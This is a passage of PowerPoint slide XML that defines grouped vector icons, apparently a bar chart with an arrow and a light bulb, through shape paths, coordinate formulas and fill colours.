                      <a:pt x="106" y="177"/>
                      <a:pt x="92" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="177"/>
                      <a:pt x="63" y="171"/>
                      <a:pt x="63" y="187"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6382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69"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="11140166" y="4088033"/>
              <a:ext cx="468000" cy="468000"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="650875" cy="620712"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Oval 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="650875" cy="6207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buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="007DA7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" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="165100" y="174625"/>
                <a:ext cx="373062" cy="265112"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62120575 w 454"/>
                  <a:gd name="T1" fmla="*/ 109507727 h 338"/>
                  <a:gd name="T2" fmla="*/ 111412419 w 454"/>
                  <a:gd name="T3" fmla="*/ 31375770 h 338"/>
                  <a:gd name="T4" fmla="*/ 124241972 w 454"/>
                  <a:gd name="T5" fmla="*/ 18456658 h 338"/>
                  <a:gd name="T6" fmla="*/ 236329847 w 454"/>
                  <a:gd name="T7" fmla="*/ 26453942 h 338"/>
                  <a:gd name="T8" fmla="*/ 230252387 w 454"/>
                  <a:gd name="T9" fmla="*/ 14149765 h 338"/>
                  <a:gd name="T10" fmla="*/ 255911493 w 454"/>
                  <a:gd name="T11" fmla="*/ 6767415 h 338"/>
                  <a:gd name="T12" fmla="*/ 273467594 w 454"/>
                  <a:gd name="T13" fmla="*/ 7998068 h 338"/>
                  <a:gd name="T14" fmla="*/ 268065590 w 454"/>
                  <a:gd name="T15" fmla="*/ 31375770 h 338"/>
                  <a:gd name="T16" fmla="*/ 258612495 w 454"/>
                  <a:gd name="T17" fmla="*/ 43679947 h 338"/>
                  <a:gd name="T18" fmla="*/ 194465552 w 454"/>
                  <a:gd name="T19" fmla="*/ 97818484 h 338"/>
                  <a:gd name="T20" fmla="*/ 193790096 w 454"/>
                  <a:gd name="T21" fmla="*/ 97818484 h 338"/>
                  <a:gd name="T22" fmla="*/ 296424876 w 454"/>
                  <a:gd name="T23" fmla="*/ 190100991 h 338"/>
                  <a:gd name="T24" fmla="*/ 296424876 w 454"/>
                  <a:gd name="T25" fmla="*/ 207941931 h 338"/>
                  <a:gd name="T26" fmla="*/ 237679937 w 454"/>
                  <a:gd name="T27" fmla="*/ 207941931 h 338"/>
                  <a:gd name="T28" fmla="*/ 173533816 w 454"/>
                  <a:gd name="T29" fmla="*/ 207941931 h 338"/>
                  <a:gd name="T30" fmla="*/ 110062329 w 454"/>
                  <a:gd name="T31" fmla="*/ 207941931 h 338"/>
                  <a:gd name="T32" fmla="*/ 45915386 w 454"/>
                  <a:gd name="T33" fmla="*/ 207941931 h 338"/>
                  <a:gd name="T34" fmla="*/ 0 w 454"/>
                  <a:gd name="T35" fmla="*/ 199328928 h 338"/>
                  <a:gd name="T36" fmla="*/ 9453095 w 454"/>
                  <a:gd name="T37" fmla="*/ 0 h 338"/>
                  <a:gd name="T38" fmla="*/ 19581646 w 454"/>
                  <a:gd name="T39" fmla="*/ 190100991 h 338"/>
                  <a:gd name="T40" fmla="*/ 45915386 w 454"/>
                  <a:gd name="T41" fmla="*/ 150727153 h 338"/>
                  <a:gd name="T42" fmla="*/ 73600038 w 454"/>
                  <a:gd name="T43" fmla="*/ 142114150 h 338"/>
                  <a:gd name="T44" fmla="*/ 83053133 w 454"/>
                  <a:gd name="T45" fmla="*/ 190100991 h 338"/>
                  <a:gd name="T46" fmla="*/ 110062329 w 454"/>
                  <a:gd name="T47" fmla="*/ 89821201 h 338"/>
                  <a:gd name="T48" fmla="*/ 137746159 w 454"/>
                  <a:gd name="T49" fmla="*/ 81208198 h 338"/>
                  <a:gd name="T50" fmla="*/ 147199254 w 454"/>
                  <a:gd name="T51" fmla="*/ 190100991 h 338"/>
                  <a:gd name="T52" fmla="*/ 173533816 w 454"/>
                  <a:gd name="T53" fmla="*/ 119351383 h 338"/>
                  <a:gd name="T54" fmla="*/ 201217646 w 454"/>
                  <a:gd name="T55" fmla="*/ 110738380 h 338"/>
                  <a:gd name="T56" fmla="*/ 210670741 w 454"/>
                  <a:gd name="T57" fmla="*/ 190100991 h 338"/>
                  <a:gd name="T58" fmla="*/ 237679937 w 454"/>
                  <a:gd name="T59" fmla="*/ 69518955 h 338"/>
                  <a:gd name="T60" fmla="*/ 265364588 w 454"/>
                  <a:gd name="T61" fmla="*/ 60905952 h 338"/>
                  <a:gd name="T62" fmla="*/ 274817684 w 454"/>
                  <a:gd name="T63" fmla="*/ 190100991 h 33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454" h="338">
                    <a:moveTo>
                      <a:pt x="186" y="71"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="92" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="33"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="334" y="29"/>
                      <a:pt x="335" y="24"/>
                      <a:pt x="341" y="23"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="359" y="17"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="364" y="16"/>
                      <a:pt x="373" y="13"/>
                      <a:pt x="379" y="11"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="397" y="5"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="402" y="4"/>
                      <a:pt x="406" y="7"/>
                      <a:pt x="405" y="13"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="401" y="30"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="400" y="36"/>
                      <a:pt x="398" y="45"/>
                      <a:pt x="397" y="51"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="393" y="68"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="392" y="73"/>
                      <a:pt x="387" y="75"/>
                      <a:pt x="383" y="71"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="372" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="71"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="439" y="309"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="447" y="309"/>
                      <a:pt x="454" y="316"/>
                      <a:pt x="454" y="324"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="331"/>
                      <a:pt x="447" y="338"/>
                      <a:pt x="439" y="338"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="407" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="338"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="338"/>
                      <a:pt x="0" y="331"/>
                      <a:pt x="0" y="324"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="7"/>
                      <a:pt x="6" y="0"/>
                      <a:pt x="14" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="0"/>
                      <a:pt x="28" y="7"/>
                      <a:pt x="28" y="14"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="29" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="245"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="237"/>
                      <a:pt x="75" y="231"/>
                      <a:pt x="83" y="231"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="109" y="231"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="231"/>
                      <a:pt x="123" y="237"/>
                      <a:pt x="123" y="245"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="123" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="146"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="138"/>
                      <a:pt x="169" y="132"/>
                      <a:pt x="177" y="132"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="204" y="132"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="132"/>
                      <a:pt x="218" y="138"/>
                      <a:pt x="218" y="146"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="218" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="257" y="187"/>
                      <a:pt x="263" y="180"/>
                      <a:pt x="271" y="180"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="298" y="180"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="306" y="180"/>
                      <a:pt x="312" y="187"/>
                      <a:pt x="312" y="194"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="312" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="113"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="352" y="105"/>
                      <a:pt x="358" y="99"/>
                      <a:pt x="366" y="99"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="393" y="99"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="401" y="99"/>
                      <a:pt x="407" y="105"/>
                      <a:pt x="407" y="113"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="407" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="309"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6382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6" name="组合 60"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="9674224" y="4089861"/>
              <a:ext cx="468000" cy="468000"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="666250" cy="672438"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Oval 1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666250" cy="67243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buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="007DA7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Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="98425" y="88900"/>
                <a:ext cx="469900" cy="425450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 160731222 w 573"/>
                  <a:gd name="T1" fmla="*/ 301044517 h 545"/>
                  <a:gd name="T2" fmla="*/ 160731222 w 573"/>
                  <a:gd name="T3" fmla="*/ 316279530 h 545"/>
                  <a:gd name="T4" fmla="*/ 233362345 w 573"/>
                  <a:gd name="T5" fmla="*/ 308357573 h 545"/>
                  <a:gd name="T6" fmla="*/ 224619581 w 573"/>
                  <a:gd name="T7" fmla="*/ 277277865 h 545"/>
                  <a:gd name="T8" fmla="*/ 160731222 w 573"/>
                  <a:gd name="T9" fmla="*/ 277277865 h 545"/>
                  <a:gd name="T10" fmla="*/ 160731222 w 573"/>
                  <a:gd name="T11" fmla="*/ 292512878 h 545"/>
                  <a:gd name="T12" fmla="*/ 233362345 w 573"/>
                  <a:gd name="T13" fmla="*/ 285200603 h 545"/>
                  <a:gd name="T14" fmla="*/ 192339173 w 573"/>
                  <a:gd name="T15" fmla="*/ 332124225 h 545"/>
                  <a:gd name="T16" fmla="*/ 220584837 w 573"/>
                  <a:gd name="T17" fmla="*/ 322982905 h 545"/>
                  <a:gd name="T18" fmla="*/ 192339173 w 573"/>
                  <a:gd name="T19" fmla="*/ 332124225 h 545"/>
                  <a:gd name="T20" fmla="*/ 193684087 w 573"/>
                  <a:gd name="T21" fmla="*/ 88972914 h 545"/>
                  <a:gd name="T22" fmla="*/ 102894979 w 573"/>
                  <a:gd name="T23" fmla="*/ 165757662 h 545"/>
                  <a:gd name="T24" fmla="*/ 156695659 w 573"/>
                  <a:gd name="T25" fmla="*/ 268746226 h 545"/>
                  <a:gd name="T26" fmla="*/ 193684087 w 573"/>
                  <a:gd name="T27" fmla="*/ 271184172 h 545"/>
                  <a:gd name="T28" fmla="*/ 238742823 w 573"/>
                  <a:gd name="T29" fmla="*/ 246198157 h 545"/>
                  <a:gd name="T30" fmla="*/ 193684087 w 573"/>
                  <a:gd name="T31" fmla="*/ 88972914 h 545"/>
                  <a:gd name="T32" fmla="*/ 75994229 w 573"/>
                  <a:gd name="T33" fmla="*/ 179773312 h 545"/>
                  <a:gd name="T34" fmla="*/ 14795699 w 573"/>
                  <a:gd name="T35" fmla="*/ 168804508 h 545"/>
                  <a:gd name="T36" fmla="*/ 14795699 w 573"/>
                  <a:gd name="T37" fmla="*/ 190742896 h 545"/>
                  <a:gd name="T38" fmla="*/ 75994229 w 573"/>
                  <a:gd name="T39" fmla="*/ 179773312 h 545"/>
                  <a:gd name="T40" fmla="*/ 370555103 w 573"/>
                  <a:gd name="T41" fmla="*/ 168804508 h 545"/>
                  <a:gd name="T42" fmla="*/ 309356574 w 573"/>
                  <a:gd name="T43" fmla="*/ 179773312 h 545"/>
                  <a:gd name="T44" fmla="*/ 370555103 w 573"/>
                  <a:gd name="T45" fmla="*/ 190742896 h 545"/>
                  <a:gd name="T46" fmla="*/ 370555103 w 573"/>
                  <a:gd name="T47" fmla="*/ 168804508 h 545"/>
                  <a:gd name="T48" fmla="*/ 294561694 w 573"/>
                  <a:gd name="T49" fmla="*/ 101161081 h 545"/>
                  <a:gd name="T50" fmla="*/ 329531931 w 573"/>
                  <a:gd name="T51" fmla="*/ 54236678 h 545"/>
                  <a:gd name="T52" fmla="*/ 277748623 w 573"/>
                  <a:gd name="T53" fmla="*/ 85926068 h 545"/>
                  <a:gd name="T54" fmla="*/ 294561694 w 573"/>
                  <a:gd name="T55" fmla="*/ 101161081 h 545"/>
                  <a:gd name="T56" fmla="*/ 191666716 w 573"/>
                  <a:gd name="T57" fmla="*/ 68862791 h 545"/>
                  <a:gd name="T58" fmla="*/ 203771766 w 573"/>
                  <a:gd name="T59" fmla="*/ 13406749 h 545"/>
                  <a:gd name="T60" fmla="*/ 179561665 w 573"/>
                  <a:gd name="T61" fmla="*/ 13406749 h 545"/>
                  <a:gd name="T62" fmla="*/ 191666716 w 573"/>
                  <a:gd name="T63" fmla="*/ 68862791 h 545"/>
                  <a:gd name="T64" fmla="*/ 86754365 w 573"/>
                  <a:gd name="T65" fmla="*/ 96894871 h 545"/>
                  <a:gd name="T66" fmla="*/ 103567436 w 573"/>
                  <a:gd name="T67" fmla="*/ 81659858 h 545"/>
                  <a:gd name="T68" fmla="*/ 51783308 w 573"/>
                  <a:gd name="T69" fmla="*/ 49971249 h 545"/>
                  <a:gd name="T70" fmla="*/ 86754365 w 573"/>
                  <a:gd name="T71" fmla="*/ 96894871 h 545"/>
                  <a:gd name="T72" fmla="*/ 90789108 w 573"/>
                  <a:gd name="T73" fmla="*/ 258386324 h 545"/>
                  <a:gd name="T74" fmla="*/ 55818872 w 573"/>
                  <a:gd name="T75" fmla="*/ 304701045 h 545"/>
                  <a:gd name="T76" fmla="*/ 107602180 w 573"/>
                  <a:gd name="T77" fmla="*/ 273621337 h 545"/>
                  <a:gd name="T78" fmla="*/ 90789108 w 573"/>
                  <a:gd name="T79" fmla="*/ 258386324 h 545"/>
                  <a:gd name="T80" fmla="*/ 298596438 w 573"/>
                  <a:gd name="T81" fmla="*/ 262652533 h 545"/>
                  <a:gd name="T82" fmla="*/ 281783367 w 573"/>
                  <a:gd name="T83" fmla="*/ 277887547 h 545"/>
                  <a:gd name="T84" fmla="*/ 333567495 w 573"/>
                  <a:gd name="T85" fmla="*/ 309576155 h 545"/>
                  <a:gd name="T86" fmla="*/ 298596438 w 573"/>
                  <a:gd name="T87" fmla="*/ 262652533 h 545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573" h="545">
                    <a:moveTo>
                      <a:pt x="334" y="494"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="239" y="494"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="494"/>
                      <a:pt x="226" y="499"/>
                      <a:pt x="226" y="506"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="513"/>
                      <a:pt x="232" y="519"/>
                      <a:pt x="239" y="519"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="334" y="519"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="341" y="519"/>
                      <a:pt x="347" y="513"/>
                      <a:pt x="347" y="506"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="499"/>
                      <a:pt x="341" y="494"/>
                      <a:pt x="334" y="494"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="334" y="455"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="334" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="455"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="455"/>
                      <a:pt x="226" y="461"/>
                      <a:pt x="226" y="468"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="475"/>
                      <a:pt x="232" y="480"/>
                      <a:pt x="239" y="480"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="334" y="480"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="341" y="480"/>
                      <a:pt x="347" y="475"/>
                      <a:pt x="347" y="468"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="461"/>
                      <a:pt x="341" y="455"/>
                      <a:pt x="334" y="455"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="286" y="545"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="286" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="545"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="288" y="146"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="288" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="146"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="146"/>
                      <a:pt x="153" y="203"/>
                      <a:pt x="153" y="272"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="153" y="342"/>
                      <a:pt x="211" y="382"/>
                      <a:pt x="217" y="404"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="223" y="425"/>
                      <a:pt x="217" y="436"/>
                      <a:pt x="233" y="441"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="249" y="446"/>
                      <a:pt x="285" y="445"/>
                      <a:pt x="285" y="445"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="288" y="445"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="288" y="445"/>
                      <a:pt x="324" y="446"/>
                      <a:pt x="340" y="441"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="355" y="436"/>
                      <a:pt x="349" y="425"/>
                      <a:pt x="355" y="404"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="361" y="382"/>
                      <a:pt x="420" y="342"/>
                      <a:pt x="420" y="272"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="203"/>
                      <a:pt x="358" y="146"/>
                      <a:pt x="288" y="146"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="113" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="113" y="295"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="285"/>
                      <a:pt x="103" y="277"/>
                      <a:pt x="91" y="277"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="22" y="277"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="277"/>
                      <a:pt x="0" y="285"/>
                      <a:pt x="0" y="295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="305"/>
                      <a:pt x="10" y="313"/>
                      <a:pt x="22" y="313"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="91" y="313"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="313"/>
                      <a:pt x="113" y="305"/>
                      <a:pt x="113" y="295"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="551" y="277"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="551" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="277"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="470" y="277"/>
                      <a:pt x="460" y="285"/>
                      <a:pt x="460" y="295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="460" y="305"/>
                      <a:pt x="470" y="313"/>
                      <a:pt x="482" y="313"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="551" y="313"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="563" y="313"/>
                      <a:pt x="573" y="305"/>
                      <a:pt x="573" y="295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="573" y="285"/>
                      <a:pt x="563" y="277"/>
                      <a:pt x="551" y="277"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="438" y="166"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="438" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="117"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="495" y="109"/>
                      <a:pt x="497" y="96"/>
                      <a:pt x="490" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="483" y="82"/>
                      <a:pt x="470" y="84"/>
                      <a:pt x="462" y="92"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="413" y="141"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="405" y="149"/>
                      <a:pt x="403" y="162"/>
                      <a:pt x="410" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="176"/>
                      <a:pt x="430" y="175"/>
                      <a:pt x="438" y="166"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="285" y="113"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="285" y="113"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="295" y="113"/>
                      <a:pt x="303" y="103"/>
                      <a:pt x="303" y="91"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="303" y="22"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="303" y="10"/>
                      <a:pt x="295" y="0"/>
                      <a:pt x="285" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="275" y="0"/>
                      <a:pt x="267" y="10"/>
                      <a:pt x="267" y="22"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="267" y="91"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="267" y="103"/>
                      <a:pt x="275" y="113"/>
                      <a:pt x="285" y="113"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="129" y="159"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="129" y="159"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="168"/>
                      <a:pt x="150" y="169"/>
                      <a:pt x="157" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="155"/>
                      <a:pt x="162" y="142"/>
                      <a:pt x="154" y="134"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="105" y="85"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="77"/>
                      <a:pt x="84" y="75"/>
                      <a:pt x="77" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="89"/>
                      <a:pt x="71" y="102"/>
                      <a:pt x="80" y="110"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="129" y="159"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="135" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="135" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="472"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="481"/>
                      <a:pt x="76" y="493"/>
                      <a:pt x="83" y="500"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="507"/>
                      <a:pt x="103" y="506"/>
                      <a:pt x="111" y="498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="160" y="449"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="440"/>
                      <a:pt x="169" y="428"/>
                      <a:pt x="163" y="421"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="414"/>
                      <a:pt x="143" y="415"/>
                      <a:pt x="135" y="424"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="444" y="431"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="444" y="431"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="436" y="422"/>
                      <a:pt x="423" y="421"/>
                      <a:pt x="416" y="428"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="435"/>
                      <a:pt x="410" y="448"/>
                      <a:pt x="419" y="456"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="468" y="505"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="476" y="513"/>
                      <a:pt x="489" y="514"/>
                      <a:pt x="496" y="508"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="503" y="501"/>
                      <a:pt x="501" y="488"/>
                      <a:pt x="493" y="480"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="444" y="431"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6382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4" name="media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304800" y="-2095203"/>
